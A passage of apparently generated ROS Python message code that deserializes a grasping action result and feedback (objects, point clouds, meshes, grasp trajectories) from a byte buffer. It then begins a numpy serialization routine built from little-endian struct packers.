(_v96.seq,) = _get_struct_I().unpack(str[start:end])
_v97 = _v96.stamp
_x = _v97
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v96.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
_v96.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
_v95.joint_names = []
for i in range(0, length):
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val4 = str[start:end].decode('utf-8', 'rosmsg')
else:
val4 = str[start:end]
_v95.joint_names.append(val4)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
_v95.points = []
for i in range(0, length):
val4 = trajectory_msgs.msg.JointTrajectoryPoint()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
s = struct.Struct(pattern)
end += s.size
val4.positions = s.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
s = struct.Struct(pattern)
end += s.size
val4.velocities = s.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
s = struct.Struct(pattern)
end += s.size
val4.accelerations = s.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
s = struct.Struct(pattern)
end += s.size
val4.effort = s.unpack(str[start:end])
# time_from_start is a Duration: signed 2x int32 (note lowercase 2i).
_v98 = val4.time_from_start
_x = _v98
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2i().unpack(str[start:end])
_v95.points.append(val4)
# grasp_posture: second JointTrajectory with identical layout.
_v99 = val2.grasp_posture
_v100 = _v99.header
start = end
end += 4
(_v100.seq,) = _get_struct_I().unpack(str[start:end])
_v101 = _v100.stamp
_x = _v101
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v100.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
_v100.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
_v99.joint_names = []
for i in range(0, length):
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val4 = str[start:end].decode('utf-8', 'rosmsg')
else:
val4 = str[start:end]
_v99.joint_names.append(val4)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
_v99.points = []
for i in range(0, length):
val4 = trajectory_msgs.msg.JointTrajectoryPoint()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
s = struct.Struct(pattern)
end += s.size
val4.positions = s.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
s = struct.Struct(pattern)
end += s.size
val4.velocities = s.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
s = struct.Struct(pattern)
end += s.size
val4.accelerations = s.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
s = struct.Struct(pattern)
end += s.size
val4.effort = s.unpack(str[start:end])
_v102 = val4.time_from_start
_x = _v102
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2i().unpack(str[start:end])
_v99.points.append(val4)
# grasp_pose: geometry_msgs/PoseStamped.
_v103 = val2.grasp_pose
_v104 = _v103.header
start = end
end += 4
(_v104.seq,) = _get_struct_I().unpack(str[start:end])
_v105 = _v104.stamp
_x = _v105
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v104.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
_v104.frame_id = str[start:end]
_v106 = _v103.pose
_v107 = _v106.position
_x = _v107
start = end
end += 24
(_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])
_v108 = _v106.orientation
_x = _v108
start = end
end += 32
(_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end])
start = end
end += 8
(val2.grasp_quality,) = _get_struct_d().unpack(str[start:end])
# pre_grasp_approach / post_grasp_retreat / post_place_retreat:
# each a GripperTranslation = stamped direction vector + 2 float32 distances.
_v109 = val2.pre_grasp_approach
_v110 = _v109.direction
_v111 = _v110.header
start = end
end += 4
(_v111.seq,) = _get_struct_I().unpack(str[start:end])
_v112 = _v111.stamp
_x = _v112
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v111.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
_v111.frame_id = str[start:end]
_v113 = _v110.vector
_x = _v113
start = end
end += 24
(_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])
_x = _v109
start = end
end += 8
(_x.desired_distance, _x.min_distance,) = _get_struct_2f().unpack(str[start:end])
_v114 = val2.post_grasp_retreat
_v115 = _v114.direction
_v116 = _v115.header
start = end
end += 4
(_v116.seq,) = _get_struct_I().unpack(str[start:end])
_v117 = _v116.stamp
_x = _v117
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v116.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
_v116.frame_id = str[start:end]
_v118 = _v115.vector
_x = _v118
start = end
end += 24
(_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])
_x = _v114
start = end
end += 8
(_x.desired_distance, _x.min_distance,) = _get_struct_2f().unpack(str[start:end])
_v119 = val2.post_place_retreat
_v120 = _v119.direction
_v121 = _v120.header
start = end
end += 4
(_v121.seq,) = _get_struct_I().unpack(str[start:end])
_v122 = _v121.stamp
_x = _v122
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v121.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
_v121.frame_id = str[start:end]
_v123 = _v120.vector
_x = _v123
start = end
end += 24
(_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])
_x = _v119
start = end
end += 8
(_x.desired_distance, _x.min_distance,) = _get_struct_2f().unpack(str[start:end])
start = end
end += 4
(val2.max_contact_force,) = _get_struct_f().unpack(str[start:end])
# allowed_touch_objects: list of strings.
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val2.allowed_touch_objects = []
for i in range(0, length):
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val3 = str[start:end].decode('utf-8', 'rosmsg')
else:
val3 = str[start:end]
val2.allowed_touch_objects.append(val3)
val1.grasps.append(val2)
self.action_result.result.objects.append(val1)
# --- action_result.result.support_surfaces: list of grasping_msgs/Object ---
# (same Object layout as val1.object above, without the grasps list).
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.action_result.result.support_surfaces = []
for i in range(0, length):
val1 = grasping_msgs.msg.Object()
_v124 = val1.header
start = end
end += 4
(_v124.seq,) = _get_struct_I().unpack(str[start:end])
_v125 = _v124.stamp
_x = _v125
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v124.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
_v124.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1.name = str[start:end].decode('utf-8', 'rosmsg')
else:
val1.name = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1.support_surface = str[start:end].decode('utf-8', 'rosmsg')
else:
val1.support_surface = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val1.properties = []
for i in range(0, length):
val2 = grasping_msgs.msg.ObjectProperty()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val2.name = str[start:end].decode('utf-8', 'rosmsg')
else:
val2.name = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val2.value = str[start:end].decode('utf-8', 'rosmsg')
else:
val2.value = str[start:end]
val1.properties.append(val2)
_v126 = val1.point_cluster
_v127 = _v126.header
start = end
end += 4
(_v127.seq,) = _get_struct_I().unpack(str[start:end])
_v128 = _v127.stamp
_x = _v128
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v127.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
_v127.frame_id = str[start:end]
_x = _v126
start = end
end += 8
(_x.height, _x.width,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
_v126.fields = []
for i in range(0, length):
val3 = sensor_msgs.msg.PointField()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val3.name = str[start:end].decode('utf-8', 'rosmsg')
else:
val3.name = str[start:end]
_x = val3
start = end
end += 9
(_x.offset, _x.datatype, _x.count,) = _get_struct_IBI().unpack(str[start:end])
_v126.fields.append(val3)
_x = _v126
start = end
end += 9
(_x.is_bigendian, _x.point_step, _x.row_step,) = _get_struct_B2I().unpack(str[start:end])
_v126.is_bigendian = bool(_v126.is_bigendian)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
_v126.data = str[start:end]
start = end
end += 1
(_v126.is_dense,) = _get_struct_B().unpack(str[start:end])
_v126.is_dense = bool(_v126.is_dense)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val1.primitives = []
for i in range(0, length):
val2 = shape_msgs.msg.SolidPrimitive()
start = end
end += 1
(val2.type,) = _get_struct_B().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
s = struct.Struct(pattern)
end += s.size
val2.dimensions = s.unpack(str[start:end])
val1.primitives.append(val2)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val1.primitive_poses = []
for i in range(0, length):
val2 = geometry_msgs.msg.Pose()
_v129 = val2.position
_x = _v129
start = end
end += 24
(_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])
_v130 = val2.orientation
_x = _v130
start = end
end += 32
(_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end])
val1.primitive_poses.append(val2)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val1.meshes = []
for i in range(0, length):
val2 = shape_msgs.msg.Mesh()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val2.triangles = []
for i in range(0, length):
val3 = shape_msgs.msg.MeshTriangle()
start = end
end += 12
val3.vertex_indices = _get_struct_3I().unpack(str[start:end])
val2.triangles.append(val3)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val2.vertices = []
for i in range(0, length):
val3 = geometry_msgs.msg.Point()
_x = val3
start = end
end += 24
(_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])
val2.vertices.append(val3)
val1.meshes.append(val2)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val1.mesh_poses = []
for i in range(0, length):
val2 = geometry_msgs.msg.Pose()
_v131 = val2.position
_x = _v131
start = end
end += 24
(_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])
_v132 = val2.orientation
_x = _v132
start = end
end += 32
(_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end])
val1.mesh_poses.append(val2)
_v133 = val1.surface
start = end
end += 32
_v133.coef = _get_struct_4d().unpack(str[start:end])
self.action_result.result.support_surfaces.append(val1)
# --- action_feedback: header, status, then feedback.object (GraspableObject) ---
_x = self
start = end
end += 12
(_x.action_feedback.header.seq, _x.action_feedback.header.stamp.secs, _x.action_feedback.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.action_feedback.header.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
self.action_feedback.header.frame_id = str[start:end]
_x = self
start = end
end += 8
(_x.action_feedback.status.goal_id.stamp.secs, _x.action_feedback.status.goal_id.stamp.nsecs,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.action_feedback.status.goal_id.id = str[start:end].decode('utf-8', 'rosmsg')
else:
self.action_feedback.status.goal_id.id = str[start:end]
start = end
end += 1
(self.action_feedback.status.status,) = _get_struct_B().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.action_feedback.status.text = str[start:end].decode('utf-8', 'rosmsg')
else:
self.action_feedback.status.text = str[start:end]
# feedback.object.object: same Object layout, assigned via full attribute paths.
_x = self
start = end
end += 12
(_x.action_feedback.feedback.object.object.header.seq, _x.action_feedback.feedback.object.object.header.stamp.secs, _x.action_feedback.feedback.object.object.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.action_feedback.feedback.object.object.header.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
self.action_feedback.feedback.object.object.header.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.action_feedback.feedback.object.object.name = str[start:end].decode('utf-8', 'rosmsg')
else:
self.action_feedback.feedback.object.object.name = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.action_feedback.feedback.object.object.support_surface = str[start:end].decode('utf-8', 'rosmsg')
else:
self.action_feedback.feedback.object.object.support_surface = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.action_feedback.feedback.object.object.properties = []
for i in range(0, length):
val1 = grasping_msgs.msg.ObjectProperty()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1.name = str[start:end].decode('utf-8', 'rosmsg')
else:
val1.name = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1.value = str[start:end].decode('utf-8', 'rosmsg')
else:
val1.value = str[start:end]
self.action_feedback.feedback.object.object.properties.append(val1)
_x = self
start = end
end += 12
(_x.action_feedback.feedback.object.object.point_cluster.header.seq, _x.action_feedback.feedback.object.object.point_cluster.header.stamp.secs, _x.action_feedback.feedback.object.object.point_cluster.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.action_feedback.feedback.object.object.point_cluster.header.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
self.action_feedback.feedback.object.object.point_cluster.header.frame_id = str[start:end]
_x = self
start = end
end += 8
(_x.action_feedback.feedback.object.object.point_cluster.height, _x.action_feedback.feedback.object.object.point_cluster.width,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.action_feedback.feedback.object.object.point_cluster.fields = []
for i in range(0, length):
val1 = sensor_msgs.msg.PointField()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1.name = str[start:end].decode('utf-8', 'rosmsg')
else:
val1.name = str[start:end]
_x = val1
start = end
end += 9
(_x.offset, _x.datatype, _x.count,) = _get_struct_IBI().unpack(str[start:end])
self.action_feedback.feedback.object.object.point_cluster.fields.append(val1)
_x = self
start = end
end += 9
(_x.action_feedback.feedback.object.object.point_cluster.is_bigendian, _x.action_feedback.feedback.object.object.point_cluster.point_step, _x.action_feedback.feedback.object.object.point_cluster.row_step,) = _get_struct_B2I().unpack(str[start:end])
self.action_feedback.feedback.object.object.point_cluster.is_bigendian = bool(self.action_feedback.feedback.object.object.point_cluster.is_bigendian)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
self.action_feedback.feedback.object.object.point_cluster.data = str[start:end]
start = end
end += 1
(self.action_feedback.feedback.object.object.point_cluster.is_dense,) = _get_struct_B().unpack(str[start:end])
self.action_feedback.feedback.object.object.point_cluster.is_dense = bool(self.action_feedback.feedback.object.object.point_cluster.is_dense)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.action_feedback.feedback.object.object.primitives = []
for i in range(0, length):
val1 = shape_msgs.msg.SolidPrimitive()
start = end
end += 1
(val1.type,) = _get_struct_B().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
s = struct.Struct(pattern)
end += s.size
val1.dimensions = s.unpack(str[start:end])
self.action_feedback.feedback.object.object.primitives.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.action_feedback.feedback.object.object.primitive_poses = []
for i in range(0, length):
val1 = geometry_msgs.msg.Pose()
_v134 = val1.position
_x = _v134
start = end
end += 24
(_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])
_v135 = val1.orientation
_x = _v135
start = end
end += 32
(_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end])
self.action_feedback.feedback.object.object.primitive_poses.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.action_feedback.feedback.object.object.meshes = []
for i in range(0, length):
val1 = shape_msgs.msg.Mesh()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val1.triangles = []
for i in range(0, length):
val2 = shape_msgs.msg.MeshTriangle()
start = end
end += 12
val2.vertex_indices = _get_struct_3I().unpack(str[start:end])
val1.triangles.append(val2)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val1.vertices = []
for i in range(0, length):
val2 = geometry_msgs.msg.Point()
_x = val2
start = end
end += 24
(_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])
val1.vertices.append(val2)
self.action_feedback.feedback.object.object.meshes.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.action_feedback.feedback.object.object.mesh_poses = []
for i in range(0, length):
val1 = geometry_msgs.msg.Pose()
_v136 = val1.position
_x = _v136
start = end
end += 24
(_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])
_v137 = val1.orientation
_x = _v137
start = end
end += 32
(_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end])
self.action_feedback.feedback.object.object.mesh_poses.append(val1)
start = end
end += 32
self.action_feedback.feedback.object.object.surface.coef = _get_struct_4d().unpack(str[start:end])
# feedback.object.grasps: moveit_msgs/Grasp list, same layout as in the result.
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.action_feedback.feedback.object.grasps = []
for i in range(0, length):
val1 = moveit_msgs.msg.Grasp()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1.id = str[start:end].decode('utf-8', 'rosmsg')
else:
val1.id = str[start:end]
_v138 = val1.pre_grasp_posture
_v139 = _v138.header
start = end
end += 4
(_v139.seq,) = _get_struct_I().unpack(str[start:end])
_v140 = _v139.stamp
_x = _v140
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v139.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
_v139.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
_v138.joint_names = []
for i in range(0, length):
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val3 = str[start:end].decode('utf-8', 'rosmsg')
else:
val3 = str[start:end]
_v138.joint_names.append(val3)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
_v138.points = []
for i in range(0, length):
val3 = trajectory_msgs.msg.JointTrajectoryPoint()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
s = struct.Struct(pattern)
end += s.size
val3.positions = s.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
s = struct.Struct(pattern)
end += s.size
val3.velocities = s.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
s = struct.Struct(pattern)
end += s.size
val3.accelerations = s.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
s = struct.Struct(pattern)
end += s.size
val3.effort = s.unpack(str[start:end])
_v141 = val3.time_from_start
_x = _v141
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2i().unpack(str[start:end])
_v138.points.append(val3)
_v142 = val1.grasp_posture
_v143 = _v142.header
start = end
end += 4
(_v143.seq,) = _get_struct_I().unpack(str[start:end])
_v144 = _v143.stamp
_x = _v144
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v143.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
_v143.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
_v142.joint_names = []
for i in range(0, length):
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val3 = str[start:end].decode('utf-8', 'rosmsg')
else:
val3 = str[start:end]
_v142.joint_names.append(val3)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
_v142.points = []
for i in range(0, length):
val3 = trajectory_msgs.msg.JointTrajectoryPoint()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
s = struct.Struct(pattern)
end += s.size
val3.positions = s.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
s = struct.Struct(pattern)
end += s.size
val3.velocities = s.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
s = struct.Struct(pattern)
end += s.size
val3.accelerations = s.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
s = struct.Struct(pattern)
end += s.size
val3.effort = s.unpack(str[start:end])
_v145 = val3.time_from_start
_x = _v145
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2i().unpack(str[start:end])
_v142.points.append(val3)
_v146 = val1.grasp_pose
_v147 = _v146.header
start = end
end += 4
(_v147.seq,) = _get_struct_I().unpack(str[start:end])
_v148 = _v147.stamp
_x = _v148
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v147.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
_v147.frame_id = str[start:end]
_v149 = _v146.pose
_v150 = _v149.position
_x = _v150
start = end
end += 24
(_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])
_v151 = _v149.orientation
_x = _v151
start = end
end += 32
(_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end])
start = end
end += 8
(val1.grasp_quality,) = _get_struct_d().unpack(str[start:end])
_v152 = val1.pre_grasp_approach
_v153 = _v152.direction
_v154 = _v153.header
start = end
end += 4
(_v154.seq,) = _get_struct_I().unpack(str[start:end])
_v155 = _v154.stamp
_x = _v155
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v154.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
_v154.frame_id = str[start:end]
_v156 = _v153.vector
_x = _v156
start = end
end += 24
(_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])
_x = _v152
start = end
end += 8
(_x.desired_distance, _x.min_distance,) = _get_struct_2f().unpack(str[start:end])
_v157 = val1.post_grasp_retreat
_v158 = _v157.direction
_v159 = _v158.header
start = end
end += 4
(_v159.seq,) = _get_struct_I().unpack(str[start:end])
_v160 = _v159.stamp
_x = _v160
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v159.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
_v159.frame_id = str[start:end]
_v161 = _v158.vector
_x = _v161
start = end
end += 24
(_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])
_x = _v157
start = end
end += 8
(_x.desired_distance, _x.min_distance,) = _get_struct_2f().unpack(str[start:end])
_v162 = val1.post_place_retreat
_v163 = _v162.direction
_v164 = _v163.header
start = end
end += 4
(_v164.seq,) = _get_struct_I().unpack(str[start:end])
_v165 = _v164.stamp
_x = _v165
start = end
end += 8
(_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v164.frame_id = str[start:end].decode('utf-8', 'rosmsg')
else:
_v164.frame_id = str[start:end]
_v166 = _v163.vector
_x = _v166
start = end
end += 24
(_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])
_x = _v162
start = end
end += 8
(_x.desired_distance, _x.min_distance,) = _get_struct_2f().unpack(str[start:end])
start = end
end += 4
(val1.max_contact_force,) = _get_struct_f().unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val1.allowed_touch_objects = []
for i in range(0, length):
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val2 = str[start:end].decode('utf-8', 'rosmsg')
else:
val2 = str[start:end]
val1.allowed_touch_objects.append(val2)
self.action_feedback.feedback.object.grasps.append(val1)
return self
except struct.error as e:
raise genpy.DeserializationError(e) # most likely buffer underfill
def serialize_numpy(self, buff, numpy):
    """
    serialize message with numpy array types into buffer

    Produces the exact genpy wire format: little-endian throughout,
    strings and variable-length arrays carry a uint32 length prefix,
    fixed-size sub-messages are packed back-to-back with no padding.

    :param buff: buffer, ``StringIO``
    :param numpy: numpy python module
    """
    # Pre-compiled little-endian packers, hoisted once per call.
    _pI = struct.Struct('<I')
    _p2I = struct.Struct('<2I')
    _p3I = struct.Struct('<3I')
    _p2i = struct.Struct('<2i')
    _pB = struct.Struct('<B')
    _pB2I = struct.Struct('<B2I')
    _pIBI = struct.Struct('<IBI')
    _p2f = struct.Struct('<2f')
    _pf = struct.Struct('<f')
    _pd = struct.Struct('<d')
    _p3d = struct.Struct('<3d')
    _p4d = struct.Struct('<4d')
    # Same test genpy uses for its module-level `python3` flag.
    _py3 = sys.hexversion > 0x03000000
    write = buff.write

    def w_string(s):
        # uint32 length prefix followed by the utf-8 encoded bytes.
        if _py3 or type(s) == unicode:
            s = s.encode('utf-8')
        length = len(s)
        write(struct.Struct('<I%ss' % length).pack(length, s))

    def w_header(h):
        # std_msgs/Header: seq, stamp (secs, nsecs), frame_id.
        write(_p3I.pack(h.seq, h.stamp.secs, h.stamp.nsecs))
        w_string(h.frame_id)

    def w_pose(p):
        # geometry_msgs/Pose: position (3d) then quaternion (4d).
        write(_p3d.pack(p.position.x, p.position.y, p.position.z))
        q = p.orientation
        write(_p4d.pack(q.x, q.y, q.z, q.w))

    def w_float64_array(a):
        # Length-prefixed float64 array (numpy arrays in the *_numpy codec).
        # NOTE: ndarray.tostring() was removed in NumPy 2.0; tobytes() is
        # the byte-identical replacement.
        write(_pI.pack(len(a)))
        write(a.tobytes())

    def w_cloud(pc):
        # sensor_msgs/PointCloud2.
        w_header(pc.header)
        write(_p2I.pack(pc.height, pc.width))
        write(_pI.pack(len(pc.fields)))
        for f in pc.fields:
            w_string(f.name)
            write(_pIBI.pack(f.offset, f.datatype, f.count))
        write(_pB2I.pack(pc.is_bigendian, pc.point_step, pc.row_step))
        data = pc.data
        length = len(data)
        # data may be encoded as a list of ints; serialize as bytes then
        if type(data) in [list, tuple]:
            write(struct.Struct('<I%sB' % length).pack(length, *data))
        else:
            write(struct.Struct('<I%ss' % length).pack(length, data))
        write(_pB.pack(pc.is_dense))

    def w_object(obj):
        # grasping_msgs/Object.
        w_header(obj.header)
        w_string(obj.name)
        w_string(obj.support_surface)
        write(_pI.pack(len(obj.properties)))
        for prop in obj.properties:
            w_string(prop.name)
            w_string(prop.value)
        w_cloud(obj.point_cluster)
        write(_pI.pack(len(obj.primitives)))
        for prim in obj.primitives:
            write(_pB.pack(prim.type))
            w_float64_array(prim.dimensions)
        write(_pI.pack(len(obj.primitive_poses)))
        for pose in obj.primitive_poses:
            w_pose(pose)
        write(_pI.pack(len(obj.meshes)))
        for mesh in obj.meshes:
            write(_pI.pack(len(mesh.triangles)))
            for tri in mesh.triangles:
                # fixed-size uint32[3]: raw bytes, no length prefix
                write(tri.vertex_indices.tobytes())
            write(_pI.pack(len(mesh.vertices)))
            for v in mesh.vertices:
                write(_p3d.pack(v.x, v.y, v.z))
